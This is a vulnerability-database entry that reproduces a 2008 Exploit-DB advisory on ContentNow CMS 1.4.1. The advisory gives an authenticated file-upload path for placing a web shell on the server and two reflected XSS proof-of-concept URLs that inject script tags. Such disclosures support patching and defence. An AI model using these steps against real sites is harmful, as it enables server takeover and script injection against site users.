header-logo
Suggest Exploit
vendor:
Content CMS
by:
CWH Underground
7.5
CVSS
HIGH
Arbitrary File Upload and Remote XSS Exploit
79
CWE
Product Name: Content CMS
Affected Version From: 1.4.2001
Affected Version To: 1.4.2001
Patch Exists: No
Related CWE: N/A
CPE: a:contentnow:contentnow_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

ContentNow CMS (Upload/XSS) Multiple Remote Vulnerabilities

This Vulnerability can upload malicious files direct to web server. An attacker can exploit this vulnerability by sending a malicious file to the upload path and then access the file from the upload directory. An attacker can also exploit the Remote XSS vulnerability by sending a malicious script to the vulnerable parameters.

Mitigation:

Ensure that user input is validated and filtered before being used in the application. Use a web application firewall to detect and block malicious input.
Source

Exploit-DB raw data:

===============================================================
  ContentNow CMS (Upload/XSS) Multiple Remote Vulnerabilities
===============================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 6 July 2008
SITE   : cwh.citec.us


#####################################################
 APPLICATION : Content CMS
 VERSION     : 1.4.1
 VENDOR	     : http://www.contentnow.mf4k.de
 DOWNLOAD    : http://downloads.sourceforge.net/contentnow/contentNow_141.zip
#####################################################

--- Arbitrary File Upload ---

	This Vulnerability can upload malicious files direct to web server.

[Login as user]

[+] Upload Path: http://[Target]/[contentNow_path]/upload.php?path=/[contentNow_path]/upload/

    [-] Example: http://192.168.24.25/contentNow/cn/upload.php?path=/contentNow/upload/

[+] Shell Script: http://[Target]/[contentNow_path]/upload/file/[Evil File]

    [-] Example: http://192.168.24.25/contentNow/upload/file/myshell.php


--- Remote XSS Exploit ---

-------------
 POC Exploit
-------------

[+] http://192.168.24.25/contentnow/upload/file/language_menu.php/>"><script>alert("XSS")</script>
[+] http://192.168.24.25/contentnow/upload/file/language_menu.php?pageid=>"><script>alert("XSS")</script>&clang=en

##################################################################
  Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  
##################################################################

# milw0rm.com [2008-07-06]